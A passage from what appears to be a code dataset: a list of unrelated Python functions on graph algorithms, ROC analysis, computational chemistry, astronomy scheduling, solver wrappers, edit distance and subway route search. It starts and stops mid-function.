cycle = set([v])\n add = True\n while w != v:\n v = spanning_tree[v]\n cycle.add(v)\n if add:\n cycles.append(cycle)\n return cycles\n\n rings_members = set()\n for n in range(phar.numnodes):\n if \"R\" in phar.nodes[n][\"type\"]:\n rings_members.add(n)\n\n cycles = []\n while len(rings_members) > 0:\n node = rings_members.pop()\n cycles += dfs_backedge(phar, node, to_check=rings_members)\n\n # join fused ring systems\n to_del = []\n for i in range(len(cycles)):\n for j in range(i):\n if len(cycles[i] & cycles[j]) > 0:\n cycles[i] = (cycles[i] | cycles[j])\n to_del.append(j)\n\n for i in range(len(cycles)-1, -1, -1):\n if i in to_del:\n del cycles[i]\n else:\n cycles[i] = list(cycles[i])\n\n ring_nodes = []\n for i in range(len(cycles)):\n n = float(len(cycles[i]))\n ring_node = {\"label\": \"R\"+str(i), \"freq\": 0.0, \"type\": {}}\n\n for j in cycles[i]:\n ring_node[\"freq\"] += phar.nodes[j][\"freq\"]\n for t in phar.nodes[j][\"type\"]:\n if t not in ring_node[\"type\"]:\n ring_node[\"type\"][t] = phar.nodes[j][\"type\"][t]\n else:\n ring_node[\"type\"][t] += phar.nodes[j][\"type\"][t]\n\n ring_nodes.append(ring_node)\n\n return ring_nodes, cycles", "def kruskal_based_heuristic(graph, root, B):\n E = set()\n\n # Stage 1\n\n # sort edges by cost, then by delay, then by node\n L_e = sorted(graph._allEdges(), key=lambda x: ( x.cost, x.delay, (x.node - graph.noNodes)%graph.noNodes))\n\n # TODO ovo se mora modificirati\n C = UnionFind()\n C.insert_objects(graph.nodes)\n\n # inicijalizirati minimalno kasnjenje\n solution_found, d_min, sp_edges = Dijkstra(graph, root, lambda x: x.delay)\n if not solution_found:\n print 'Unable to find d_min for the graph. Graph is not connected?'\n return\n print 'minimum delay per node'\n for v in d_min:\n print v, ' : ', d_min[v]\n\n # init\n delta = dict()\n p = dict()\n delta_max = dict()\n v_C = dict()\n\n for v in graph.get_vertices():\n delta[v] = d_min[v]\n p[v] = v\n delta_max[v] = 0\n v_C[v] = v\n\n number_of_components = graph.noNodes\n while number_of_components > 1 and len(L_e) > 0:\n e = L_e.pop(0)\n print '->', e\n u = e.node\n v = e.to\n\n if e not in E and C.find(u) != C.find(v):\n D_u = B - (delta[u] + e.delay + delta_max[v])\n D_v = B - (delta[v] + e.delay + delta_max[u])\n if D_u >= 0 or D_v >= 0:\n if D_u >= D_v:\n #C_u_v = v_C[u]\n C_u_v = C.find(u)\n delta[v] = delta[u] + e.delay\n p[v] = u\n root_of_subtree = v\n else:\n #C_u_v = v_C[v]\n C_u_v = C.find(v)\n delta[u] = delta[v] + e.delay\n p[u] = v\n root_of_subtree = u\n\n tree = create_graph(graph, E)\n dfs = DFS(tree, root_of_subtree)\n for edge in dfs.pre_order_edges:\n delta[edge.to] = delta[edge.node] + edge.delay\n p[edge.to] = edge.node\n\n # merge components\n E.add(e)\n C.union_left(C_u_v, v_C[u]) # ovaj union je drugaciji od standardnog uniona\n C.union_left(C_u_v, v_C[v]) #\n number_of_components -= 1\n\n # TODO popraviti ovaj dio\n # update delta_max[w] for w in C_u_v\n tree = create_graph(graph, [x for x in E if C.find(x.node) == C_u_v and C.find(x.to) == C_u_v])\n search = LongestPath(tree, C_u_v, lambda x: x.delay)\n for x in search.lp:\n delta_max[x] = search.lp[x]\n\n # print all edges in current solution\n print '+ ', e\n # stage 1 finished\n print \"Edges in a tree after Stage 1:\"\n for e in E:\n print e\n\n print\n print \"********* Stage 2 *********\"\n print\n\n C_s = C.find(root)\n print 'C_s = ', C_s\n if number_of_components > 1:\n for i in graph.get_vertices():\n C_i = C.find(i)\n if C_i != C_s:\n print 'Node ', i, ' in component ', C_i, ' not connected to root. Subtree root =', v_C[C_i]\n path_to_C_i = get_path(sp_edges, root, v_C[C_i])\n path_to_C_i.reverse()\n\n print 'path from ', v_C[C_i] , ' to ', root, ' : '\n for edge in path_to_C_i:\n print edge\n\n # finds last u such that d_min[u] = delta[u]\n u = root\n for edge in path_to_C_i:\n if d_min[edge.to] == delta[edge.to]:\n u = edge.to\n else:\n break\n print 'u = ', u\n\n path_to_u = get_path(sp_edges, u, v_C[C_i])\n path_to_u.reverse()\n\n for edge in path_to_u:\n assert d_min[edge.node] < d_min[edge.to]\n print edge.node, edge.to, p[edge.to]\n if p[edge.to] != edge.to and p[edge.to] != edge.node:\n E.add(edge)\n print 'add edge ', edge\n edge_to_remove = graph.get_edge(p[edge.to], edge.to)\n print 'edge to remove ', edge_to_remove\n E.remove(edge_to_remove)\n # TODO treba li ovdje update delta[edge.to] i p[edge.to] ???\n if edge.to == v_C[C_i]:\n print '!!! mislim da i ovdje treba dodati edge u skup rjesenja'\n E.add(edge)\n print 'add edge ', edge\n p[edge.to] = edge.node\n print\n return E", "def CalculateRoc2(dataArray,prefix,readsize,uniquehits,mappedreads,filename):\r\n starttime= time.time()\r\n uniquehits = float(uniquehits)\r\n readsize = float(readsize)\r\n \r\n \r\n entries = len(dataArray)\r\n \r\n\r\n resultmatrix = np.arange(entries*2)\r\n resultmatrix = resultmatrix.reshape(2,entries)\r\n \r\n maxrq = max(x.rq for x in dataArray)\r\n maxnm = max(x.nm[0] for x in dataArray)\r\n maxGaps= max(x.gaps[0] for x in dataArray)\r\n maxMism= max(x.mism[0] for x in dataArray)\r\n \r\n \r\n minrq = min(x.rq for x in dataArray)\r\n minnm = min(x.nm[0] for x in dataArray)\r\n minmq= min(x.mq[0] for x in dataArray)\r\n minGaps= min(x.gaps[0] for x in dataArray) \r\n minMism= min(x.mism[0] for x in dataArray) \r\n \r\n \r\n # adjust stepsize for rq since the score behaves the other way\r\n quants = [1,2,3,4,5]\r\n tempa = maxrq-minrq\r\n stepsize = tempa/5\r\n \r\n rqQuants = [round(minrq+(i-1)*stepsize,3) for i in quants]\r\n rqQuants.reverse()\r\n rqQuants[-1] =0 # last entry is rounded bigger than the smallest in the dataset\r\n \r\n nmQuants = [i*maxnm/5 for i in quants]\r\n GapsQuants = [i*maxGaps/5 for i in quants]\r\n MismQuants = [i*maxMism/5 for i in quants]\r\n\r\n rocvector = []\r\n \r\n # i = NM,l = RQ, k = MQ\r\n for l in quants: # RQ\r\n for k in quants: # GAPS\r\n for j in quants: # MISMATCH\r\n temparray = [m for m in dataArray if m.gaps[0] <= GapsQuants[k-1] and m.mism[0] <= MismQuants[j-1] and m.rq >=rqQuants[l-1]]\r\n \r\n\r\n tempids = [m.id for m in temparray]\r\n uniquereads = {}\r\n for i in xrange(0,len(tempids)):\r\n uniquereads[tempids[i]] = \"\"\r\n\r\n mappedreads = len(uniquereads)\r\n \r\n \r\n \r\n templength = len(temparray)\r\n \r\n if templength == 0:\r\n continue\r\n else:\r\n tempTP = sum(x.mr[0] for x in temparray)\r\n tempFP =templength-tempTP\r\n F = round((float(mappedreads)/ readsize) ,3)\r\n sens = round((tempTP/ uniquehits) * F,3)\r\n if tempFP == 0:\r\n spec = 0\r\n else:\r\n spec = round((tempFP / uniquehits) * F,3) \r\n \r\n rocvector.append([rqQuants[l-1],GapsQuants[k-1],MismQuants[j-1],tempTP,tempFP,templength,sens,spec,F])\r\n \r\n #print (\"%d\\t%d\\t%d\\t\" % (templength,tempTP,tempFP))\r\n\r\n #0 = NM 4 = TP 7 = sens\r\n #1 = RQ 5 = FP 8 = 1-spec\r\n #2 = GAPS 6 = P 9 = F\r\n #append needed for last entry in AUC calculation\r\n rocvector.append([0,0,0,0,0,0,0,0,0]) \r\n nproc = np.array(rocvector)\r\n \r\n #write the sens and specificity values from nproc according to the enumeration in line 149. \r\n #specificity is in cell -2\r\n # sensitivity is in cell -3\r\n sens = [i[-3] for i in nproc]\r\n spez = [i[-2] for i in nproc]\r\n \r\n # adjust ROC curve. It is necessary that it the 1-specificity ends in 1.\r\n # for the last record copy the predecessor in sens to it\r\n # and write 1 to specificity \r\n spez[-1] = 1\r\n sens[-1] = sens[-2]\r\n \r\n\r\n rocarray1 = np.array([sens,spez])\r\n rocarray1 = rocarray1.flatten('F')\r\n rocarray1= rocarray1.reshape((len(spez),2))\r\n \r\n rocarray = np.array([sens,spez])\r\n rocarray = rocarray.flatten('F')\r\n rocarray = rocarray.reshape((len(spez),2))\r\n rocarray = np.sort(rocarray.view('float,float'), order=['f0','f1'], axis=0).view(np.float)\r\n \r\n rocarrayCorrected = rocarray\r\n \r\n #print rocarrayCorrected\r\n # project points where...\r\n for m in range(len(rocarrayCorrected)-2,-1,-1):\r\n if (rocarrayCorrected[m,1] >= rocarrayCorrected[m+1,1]):\r\n rocarrayCorrected[m,1] = rocarrayCorrected[m+1,1]\r\n\r\n \r\n #print rocarrayCorrected \r\n plt.hold(True)\r\n plt.figure()\r\n plt.subplot(111)\r\n #plt.scatter(spez, sens, c='b', marker='o', facecolor='red')\r\n #plt.plot(rocarray[:,1], rocarray[:,0]\r\n plt.plot(rocarrayCorrected[:,1],rocarrayCorrected[:,0], marker='o', markersize=7,linestyle='--', color='r', label='projected')\r\n plt.plot(rocarray1[:,1], rocarray1[:,0], linestyle=\"None\",label='real',marker='.',color='g')\r\n plt.xlabel('1-specificity')\r\n plt.ylabel('sensitivity')\r\n plt.title(r'ROC:'+filename)\r\n plt.axis([-0.1,1.1,-0.1,1.1])\r\n plt.grid(True)\r\n plt.legend(loc='lower right')\r\n plt.tight_layout()\r\n plt.savefig(prefix + \"_ROC.pdf\",format='pdf')\r\n plt.clf \r\n \r\n \r\n AUC = trapezoidal_rule(rocarrayCorrected[:,1], rocarrayCorrected[:,0])\r\n \r\n fobj = open(prefix+\"_roctable.txt\",\"w\")\r\n fobj.write(\"RQ\\tGAPS\\tMM\\tPTP\\tFP\\tP\\tSn\\t1-Sp\\tF\\r\\n\")\r\n for i in xrange(0,len(rocvector),1):\r\n temp = [str(k) for k in rocvector[i]]\r\n tempstr = \"\\t\".join(temp)\r\n fobj.write(tempstr+\"\\r\\n\")\r\n\r\n endtime= time.time()\r\n return(round(AUC,3))", "def test_kkrflex(self, kkrhost_local_code):\n from aiida.orm import load_node, Dict, Bool\n from masci_tools.io.kkr_params import kkrparams\n from aiida_kkr.calculations.kkr import KkrCalculation\n\n # load necessary files from db_dump files\n import_with_migration('files/db_dump_kkrcalc.tar.gz')\n\n # first load parent voronoi calculation\n kkr_calc = load_node('3058bd6c-de0b-400e-aff5-2331a5f5d566')\n\n # extract KKR parameter (add KKRFLEX option)\n params_node = kkr_calc.inputs.parameters\n params = params_node.get_dict()\n params['RUNOPT'] = ['KKRFLEX']\n params_node = Dict(params)\n\n # create an impurity_info node\n imp_info = Dict({'Rcut': 1.01, 'ilayer_center': 0, 'Zimp': [29.]})\n\n options = {'resources': {'num_machines': 1, 'tot_num_mpiprocs': 1}, 'queue_name': queuename}\n builder = KkrCalculation.get_builder()\n builder.code = kkrhost_local_code\n builder.metadata.options = options\n builder.parameters = params_node\n builder.parent_folder = kkr_calc.outputs.remote_folder\n builder.impurity_info = imp_info\n builder.retrieve_kkrflex = Bool(False)\n builder.metadata.dry_run = dry_run\n out = run(builder)\n print(out)", "def localMin(eccMap, binSize):\r\n\r\n eccMap2 = np.array(eccMap)\r\n cutStep = np.arange(np.nanmin(eccMap2[:]) - binSize,\r\n np.nanmax(eccMap2[:]) + binSize * 2,\r\n binSize)\r\n NumOfMin = 0\r\n i = 0\r\n while (NumOfMin <= 1) and (i < len(cutStep)):\r\n currThr = cutStep[i]\r\n marker = np.zeros(eccMap.shape, dtype=np.int)\r\n marker[eccMap2 <= (currThr)] = 1\r\n marker, NumOfMin = ni.measurements.label(marker)\r\n i = i + 1\r\n\r\n # if NumOfMin == 1:\r\n # print 'Only one local minumum was found!!!'\r\n # elif NumOfMin == 0:\r\n # print 'No local minumum was found!!!'\r\n # else:\r\n # print str(NumOfMin) + ' local minuma were found!!!'\r\n #\r\n # if NumOfMin > 1:\r\n # plt.figure()\r\n # plt.imshow(marker,vmin=np.amin(marker), vmax=np.amax(marker),cmap='jet',interpolation='nearest')\r\n # plt.colorbar()\r\n # plt.title('marker from local min')\r\n\r\n return marker", "def calcfZmin(self, sInds, Obs, TL, TK, mode, hashname, koMap=None, koTimes=None):\r\n\r\n # Generate cache Name\r\n cachefname = hashname + \"fZmin\"\r\n\r\n # Check if file exists\r\n if os.path.isfile(cachefname): # check if file exists\r\n self.vprint(\"Loading cached fZmins from %s\" % cachefname)\r\n with open(cachefname, \"rb\") as f: # load from cache\r\n tmp1 = pickle.load(f)\r\n fZmins = tmp1[\"fZmins\"]\r\n fZtypes = tmp1[\"fZtypes\"]\r\n return fZmins, fZtypes\r\n else:\r\n tmpAssert = np.any(self.fZMap[mode[\"syst\"][\"name\"]])\r\n assert tmpAssert, \"fZMap does not exist for the mode of interest\"\r\n\r\n tmpfZ = np.asarray(self.fZMap[mode[\"syst\"][\"name\"]])\r\n fZ_matrix = tmpfZ[sInds, :] # Apply previous filters to fZMap\r\n # When are stars in KO regions\r\n # if this is being calculated without a koMap\r\n if koMap is None:\r\n koTimes = self.fZTimes\r\n\r\n # calculating keepout angles and keepout values for 1 system in mode\r\n koStr = list(\r\n filter(\r\n lambda syst: syst.startswith(\"koAngles_\"), mode[\"syst\"].keys()\r\n )\r\n )\r\n koangles = np.asarray([mode[\"syst\"][k] for k in koStr]).reshape(1, 4, 2)\r\n kogoodStart = Obs.keepout(TL, sInds, koTimes[0], koangles)[0].T\r\n nn = len(sInds)\r\n mm = len(koTimes)\r\n else:\r\n # getting the correct koTimes to look up in koMap\r\n assert (\r\n koTimes is not None\r\n ), \"Corresponding koTimes not included with koMap.\"\r\n kogoodStart = koMap.T\r\n [nn, mm] = np.shape(koMap)\r\n\r\n fZmins = np.ones([nn, mm]) * sys.float_info.max\r\n fZtypes = np.ones([nn, mm]) * sys.float_info.max\r\n # Find inds Entering, exiting ko\r\n # i = 0 # star ind\r\n for k in np.arange(len(sInds)):\r\n i = sInds[k] # Star ind\r\n\r\n # double check this is entering\r\n indsEntering = list(\r\n np.where(np.diff(kogoodStart[:, i].astype(int)) == -1.0)[0]\r\n )\r\n\r\n # without the +1, this gives kogoodStart[indsExiting,i] = 0 meaning\r\n # the stars are still in keepout\r\n indsExiting = (\r\n np.where(np.diff(kogoodStart[:, i].astype(int)) == 1.0)[0] + 1\r\n )\r\n indsExiting = [\r\n indsExiting[j] if indsExiting[j] < len(kogoodStart[:, i]) - 1 else 0\r\n for j in np.arange(len(indsExiting))\r\n ] # need to ensure +1 increment doesnt exceed kogoodStart size\r\n\r\n # Find inds of local minima in fZ\r\n fZlocalMinInds = (\r\n np.where(np.diff(np.sign(np.diff(fZ_matrix[i, :]))) > 0)[0] + 1\r\n ) # Find local minima of fZ, +1 to correct for indexing offset\r\n # Filter where local minima occurs in keepout region\r\n fZlocalMinInds = [ind for ind in fZlocalMinInds if kogoodStart[ind, i]]\r\n\r\n # Remove any indsEntering/indsExiting from fZlocalMinInds\r\n tmp1 = set(list(indsEntering) + list(indsExiting))\r\n # remove anything in tmp1 from fZlocalMinInds\r\n fZlocalMinInds = list(set(list(fZlocalMinInds)) - tmp1)\r\n\r\n minInds = (\r\n np.append(np.append(indsEntering, indsExiting), fZlocalMinInds)\r\n ).astype(int)\r\n\r\n if np.any(minInds):\r\n fZmins[i, minInds] = fZ_matrix[i, minInds]\r\n fZtypes[i, indsEntering] = 0\r\n fZtypes[i, indsExiting] = 1\r\n fZtypes[i, fZlocalMinInds] = 2\r\n\r\n with open(cachefname, \"wb\") as fo:\r\n pickle.dump({\"fZmins\": fZmins, \"fZtypes\": fZtypes}, fo)\r\n self.vprint(\"Saved cached fZmins to %s\" % cachefname)\r\n\r\n return fZmins, fZtypes", "def get_RM_K(vsini_kms, rp_Rearth, Rs_Rsun):\n D = (rp_Rearth * u.Rearth.to(u.m) / Rs_Rsun * u.Rsun.to(u.m)) ** 2\n return (vsini_kms * D / (1 - D)) * 1e3", "def _local_search(self):\n\n # Set occupancies of rigid cluster and its direct neighboring atoms to\n # 1 for clash detection and MIQP\n selection = self.ligand._selection\n self.ligand._active[selection] = True\n center = self.ligand.coor[self._cluster].mean(axis=0)\n new_coor_set = []\n new_bs = []\n for coor, b in zip(self._coor_set, self._bs):\n self.ligand._coor[selection] = coor\n self.ligand._b[selection] = b\n rotator = GlobalRotator(self.ligand, center=center)\n for rotmat in RotationSets.get_local_set():\n rotator(rotmat)\n translator = Translator(self.ligand)\n iterator = itertools.product(\n *[np.arange(*trans) for trans in self._trans_box]\n )\n for translation in iterator:\n translator(translation)\n new_coor = self.ligand.coor\n if self.options.remove_conformers_below_cutoff:\n values = self.xmap.interpolate(new_coor)\n mask = self.ligand.e != \"H\"\n if np.min(values[mask]) < self.options.density_cutoff:\n continue\n if self.options.external_clash:\n if not self._cd() and not self.ligand.clashes():\n if new_coor_set:\n delta = np.array(new_coor_set) - np.array(new_coor)\n if (\n np.sqrt(\n min(np.square((delta)).sum(axis=2).sum(axis=1))\n )\n >= self.options.rmsd_cutoff\n ):\n new_coor_set.append(new_coor)\n new_bs.append(b)\n else:\n new_coor_set.append(new_coor)\n new_bs.append(b)\n elif not self.ligand.clashes():\n if new_coor_set:\n delta = np.array(new_coor_set) - np.array(new_coor)\n if (\n np.sqrt(min(np.square((delta)).sum(axis=2).sum(axis=1)))\n >= self.options.rmsd_cutoff\n ):\n new_coor_set.append(new_coor)\n new_bs.append(b)\n else:\n new_coor_set.append(new_coor)\n new_bs.append(b)\n self.ligand._active[self.ligand._selection] = False\n selection = self.ligand._selection[self._cluster]\n self.ligand._active[selection] = True\n for atom in self._cluster:\n atom_sel = self.ligand._selection[self.ligand.connectivity[atom]]\n self.ligand._active[atom_sel] = True\n self.conformer = self.ligand\n self._coor_set = new_coor_set\n self._bs = new_bs\n if len(self._coor_set) < 1:\n logger.warning(\n f\"{self.ligand.resn[0]}: \"\n f\"Local search {self._cluster_index}: {len(self._coor_set)} conformers\"\n )\n return\n\n # QP score conformer occupancy\n logger.debug(\"Converting densities.\")\n self._convert()\n self._solve_qp()\n logger.debug(\"Updating conformers\")\n self._update_conformers()\n if self.options.write_intermediate_conformers:\n self._write_intermediate_conformers(prefix=\"localsearch_ligand_qp\")\n if len(self._coor_set) < 1:\n logger.warning(\n f\"{self.ligand.resn[0]}: \"\n f\"Local search QP {self._cluster_index}: {len(self._coor_set)} conformers\"\n )\n return\n\n # MIQP score conformer occupancy\n self._convert()\n self._solve_miqp(\n threshold=self.options.threshold, cardinality=self.options.cardinality\n )\n self._update_conformers()\n if self.options.write_intermediate_conformers:\n self._write_intermediate_conformers(prefix=\"localsearch_ligand_miqp\")", "def breadthFirstSearch(problem):\r\n\t\"*** YOUR CODE HERE ***\"\r\n\tfrom game import Directions\r\n\t#i = 0\r\n\tfrontera=util.Queue()\r\n\testadoInicial= problem.getStartState()\r\n\tfrontera.push((estadoInicial, [],0))\r\n\tvisitados=[]\r\n\tvisitados.append(estadoInicial)\r\n\r\n\twhile not(frontera.isEmpty()):\r\n\t\t(estado, camino, costo) =frontera.pop()\r\n\t\tif(problem.isGoalState(estado)):\r\n\t\t\tbreak\r\n\r\n\t\tsucesores=problem.getSuccessors(estado)\r\n\t\tfor sucesor in sucesores:\r\n\t\t\t#i = i+1\r\n\t\t\t#print (i)\r\n\t\t\tif sucesor[0] not in visitados:\r\n\t\t\t\tfrontera.push((sucesor[0], camino + [sucesor[1]], costo + sucesor[2]))\r\n\t\t\t\tvisitados.append(sucesor[0])\r\n\tprint ('Cantidad de nodos en memoria: {}').format(len(frontera.list))\r\n\treturn camino", "def solve(self):\n # check for jacobian and set it if present and to be used\n if self.use_sparse:\n if self._use_jac and hasattr(self.problem,'sparse_jac'):\n jac = self.problem.sparse_jac\n else:\n jac = None\n else:\n if self._use_jac and hasattr(self.problem,'jac'):\n jac = self.problem.jac\n else:\n jac = None\n \n # Initialize solver and solve \n \n solved = False\n local_min = False\n\n res = N.zeros(self.x0.__len__())\n while (not solved) and self.reg_count < 2:\n try:\n if self._use_fscale:\n self.solver.KINSOL_init(self.func,self.x0,self.dim,jac,self.constraints,self.use_sparse,self.verbosity,self.norm_of_res,self.reg_param,self.fscale)\n else:\n self.solver.KINSOL_init(self.func,self.x0,self.dim,jac,self.constraints,self.use_sparse,self.verbosity,self.norm_of_res,self.reg_param,None)\n start = time.clock()\n res = self.solver.KINSOL_solve(not self._use_ls)\n stop = time.clock()\n self.exec_time += (stop - start)\n solved = True\n except KINError as error:\n if error.value == 42:\n # Try the heuristic\n if hasattr(self.problem, 'get_heuristic_x0'):\n print \"----------------------------------------------------\"\n print \" Solver stuck with zero step-length.\"\n print \"----------------------------------------------------\"\n print \"The following variables have start value zero\"\n print \"and min set to zero causing the zero step-lenght.\"\n print \"These settings are either set by default or by user.\"\n print \"\"\n\n self.x0 = self.problem.get_heuristic_x0()\n self.reg_count += 1\n \n print \"\"\n print \"This setting (start and min to zero) can often\"\n print \"cause problem when initializing the system. \"\n print \"\"\n print \"To avoid this the above variables have\"\n print \"their start attributes reset to one.\"\n print \"\"\n print \"Trying to solve the system again...\"\n else:\n raise KINSOL_Exception(\"Regularization failed due to constraints, tried getting heuristic initial guess but failed.\")\n \n\n elif (error.value == 2):\n print \"---------------------------------------------------------\"\n print \"\"\n print \" !!! WARNING !!!\"\n print \"\"\n print \" KINSOL has returned a result but the algorithm has converged\"\n print \" to a local minima, the initial values are NOT consistant!\"\n print \"\"\n print \"---------------------------------------------------------\"\n solved = True\n local_min = True\n else:\n # Other error, send onward as exception\n self.problem.check_constraints(res)\n raise KINSOL_Exception(error.msg[error.value])\n \n if not solved:\n self.solver.Free_KINSOL()\n raise KINSOL_Exception(\"Algorithm exited solution loop without finding a solution, please contact Assimulo support.\")\n\n if self.check_with_model:\n self.problem.check_constraints(res)\n if not local_min:\n print \"Problem sent to KINSOL solved.\"\n \n return res", "def compute_backpointers(s0, s1): #Tillverkar en array med backpointrs\r\n if s0 == None or s1 == None:\r\n raise Exception('Both s0 and s1 have to be set')\r\n rows = len(s0)+1 # antalet rader\r\n columns = len(s1)+1 # antalet kolumner\r\n\r\n ####### Tillverkar Levenshtein matrisen ########\r\n # Gör en tom matris med nollor\r\n distance = [[0 for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # Gör de yttre lagrerna i matrisen 0 -> len(str) vertikalt och horisontellt\r\n for i in range(1,rows):\r\n distance[i][0] = i\r\n for i in range(1,columns):\r\n distance[0][i] = i\r\n\r\n # Beräknar kostnaderna för varje plats inne i matrisen och sätter in dem\r\n # kollar om bokstaven på indexet i de två orden är samma i sådana fall kostar det 0\r\n # och skall ha samma värde som diagonalt innan, annars kostar det 1 från över eller underself.\r\n for column in range(1,columns):\r\n for row in range(1,rows): # kolla varje rad i vare column\r\n if s0[row-1] == s1[column -1]: # om det är samma bokstav kostar det 0\r\n c = 0\r\n else: # annars kostar det 2\r\n c = 2\r\n distance[row][column] = min(distance[row-1][column] + 1,distance[row][column-1] + 1,distance[row-1][column-1] + c)\r\n # raden över säger att det minsta värdet av över eller bredvid + 1 eller diagonalt innan plus (0 eller 2)\r\n # skall sättas in på platsen i matrisen.\r\n\r\n # det minsta avståndet är\r\n cost = distance[row][column]\r\n print(\"totalkostnaden är\")\r\n print(cost)\r\n\r\n\r\n ####### Tillverkar backptr-matrisen ########\r\n # Tillverkar en tom matris med [0,0] för till backptr-matrisen\r\n backptr = [[[0, 0] for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # går igenom platserna i Levenshtein matrisen bakirfrån\r\n for column in range(columns-1,0,-1):\r\n for row in range(rows-1,0,-1):\r\n # Om värdet till vänster är det minsta: peka vänster\r\n if distance[row][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row\r\n backptr[row][column][1] = column -1\r\n # Om värdet över är det minsta: peka upp\r\n if distance[row-1][column] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row -1\r\n backptr[row][column][1] = column\r\n # om värdet diagonalt är minst: peka på diagonalt\r\n if distance[row-1][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row-1\r\n backptr[row][column][1] = column -1\r\n\r\n # Gör yttervärdena i matrisen, (OBS behövs ej)\r\n for i in range(0,rows):\r\n j = i-1\r\n backptr[i][0][0] = j\r\n backptr[i][0][1] = 0\r\n for i in range(0,columns):\r\n j = i-1\r\n backptr[0][i][1] = j\r\n backptr[0][i][0] = 0\r\n\r\n return backptr", "def solution(n, s, a, b, fares):\n\n table = [[float(\"inf\")]*n for _ in range(n)]\n for (c, d, f) in fares:\n table[c-1][d-1] = f\n table[d-1][c-1] = f\n\n for idx in range(n):\n table[idx][idx] = 0\n\n # do floyd to find all shortest paths\n for kdx in range(n):\n for idx in range(n):\n for jdx in range(n):\n table[idx][jdx] = min(table[idx][jdx], table[idx][kdx] + table[kdx][jdx])\n \n# for row in table:\n# print(row)\n \n answer = table[s-1][a-1] + table[s-1][b-1]\n # print(\"seperate:\", answer)\n for idx in range(n):\n # print(\"idx 경유:\", idx, table[s-1][idx] + table[idx][a-1] + table[idx][b-1])\n answer = min(answer, table[s-1][idx] + table[idx][a-1] + table[idx][b-1])\n\n # print(\"answer:\", answer)\n return answer", "def kruskal(self):\n k = self.cc().max() + 1\n E = 2 * self.V - 2\n V = self.V\n Kedges = np.zeros((E, 2)).astype(np.int_)\n Kweights = np.zeros(E)\n iw = np.argsort(self.weights)\n label = np.arange(V)\n j = 0\n for i in range(V - k):\n a, b = self.edges[iw[j]]\n d = self.weights[iw[j]]\n while label[a] == label[b]:\n j = j + 1\n a, b = self.edges[iw[j]]\n d = self.weights[iw[j]]\n\n if label[a] != label[b]:\n lb = label[b]\n label[label == lb] = label[a]\n Kedges[2 * i] = np.array([a, b])\n Kedges[2 * i + 1] = np.array([b, a])\n Kweights[2 * i: 2 * i + 2] = d\n\n K = WeightedGraph(V, Kedges, Kweights)\n return K", "def find_rsh(v, j):\r\n\r\n zp = sp.where(v[:-1] * v[1:] <= 0)[0][0] #make a list of A[x] * A[x -1] without usinf \"for\" loop in original python.\r\n m = np.polyfit(v[(zp - 5):(zp + 5)], j[(zp -5):(zp + 5)], 1)\r\n return 1/abs(m[0]) * 1000 #[Ohm cm^2]\r", "def problem2(self, s):\n \n points = self.neighbor(100, 10, s.exhaustive_search)\n points += self.neighbor(10, 100, s.exhaustive_search)\n points += 1\n\n _testDriver.get_code(s.exhaustive_search)\n print \"\\n(Check that scipy.spatial.KDTree is not used)\"\n points *= self.grade(1)\n\n return points", "def cluster_centres_ska_v5(r_min=None, r_max=None):\n # Spiral parameters for inner and outer regions.\n num_arms = 3\n num_per_arm = 5\n start_inner = 417.82\n end_inner = 1572.13\n b_inner = 0.513\n theta0_inner = -48\n start_outer = 2146.78\n end_outer = 6370.13\n b_outer = 0.52\n theta0_outer = 135\n x_inner, y_inner = TelescopeLayout.symmetric_log_spiral(\n num_per_arm, start_inner, end_inner, b_inner, num_arms,\n theta0_inner)\n x_outer, y_outer = TelescopeLayout.symmetric_log_spiral(\n num_per_arm, start_outer, end_outer, b_outer, num_arms,\n theta0_outer)\n x = np.concatenate((x_inner, x_outer))\n y = np.concatenate((y_inner, y_outer))\n r = (x**2 + y**2)**0.5\n arm_index = [i // num_per_arm for i in range(num_per_arm * num_arms)]\n arm_index = np.hstack((arm_index, arm_index))\n\n # Sort by radius and remove the 3 innermost stations.\n idx = r.argsort()\n x = x[idx]\n y = y[idx]\n r = r[idx]\n arm_index = arm_index[idx]\n x, y, r, arm_index = (x[3:], y[3:], r[3:], arm_index[3:])\n\n if r_min and r_max:\n idx = np.where(np.logical_and(r >= r_min, r <= r_max))\n x, y, arm_index = x[idx], y[idx], arm_index[idx]\n elif r_min:\n idx = np.where(r >= r_min)\n x, y, arm_index = x[idx], y[idx], arm_index[idx]\n elif r_max:\n idx = np.where(r <= r_max)\n x, y, arm_index = x[idx], y[idx], arm_index[idx]\n return x, y, arm_index", "def search(self):\n W = np.zeros((self.subsets.shape[0],)) \n for i,E in enumerate(self.subsets):\n self.graph.setV(E) # set the nodes to their values\n W[i] = self.graph.computeW()\n self.Ws = W", "def path_search(start, goal):\n if start == goal:\n return [start]\n explored = {}\n explored[start] = 2\n queue = [ [start, ('', 0)] ]\n bestPath = [start, ('', 1110)]\n bestPathList = []\n total = 0\n costSearchingNow = 0\n while queue:\n total += 1\n # if total>40000:\n # return -1,' fail'\n if queue[0][-1][-1] != costSearchingNow:\n \tqueue.sort(key=lambda path:path[-1][-1])\n \n path = queue.pop(0)\n costSearchingNow = path[-1][-1]\n s = path[-2]\n # print len(queue)\n # cout(path)\n # print queue\n\n if s == goal:\n bestPath = path\n # print 'Find one best path ↑'\n bestPathList.append(bestPath)\n if len(queue)==0:\n # print '~~~~',total,getString \n return total,getString(bestPathList,start,goal)\n else:\n if path[-1][-1] > bestPath[-1][-1]:\n return total,getString(bestPathList,start,goal)\n\n linenum, changetimes = path[-1]\n \n for state, actions in sh_subway[s].items():\n for action in actions:\n linechange = changetimes + 1\n if linenum != action:\n linechange += changePunishment\n path2 = path[:-1] + [action, state, (action, linechange)]\n\n if (path2[-1][-1]-len(path2)/2-1)/changePunishment <= 4:\n if len(path2)>6:\n if (path2[-2] == '上海赛车场' and path2[-4]=='嘉定新城' and path2[-6]=='马陆') or (path2[-6] == '上海赛车场' and path2[-4]=='嘉定新城' and path2[-2]=='马陆') or (path2[-2] == '龙柏新村' and path2[-4]=='龙溪路' and path2[-6]=='水城路') or (path2[-6] == '龙柏新村' and path2[-4]=='龙溪路' and path2[-2]=='水城路'):\n linechange -= changePunishment\n path2 = path[:-1] + [action, state, (action, linechange)]\n\n if path2.count(state)<=1:\n if state not in explored:\n explored[state] = 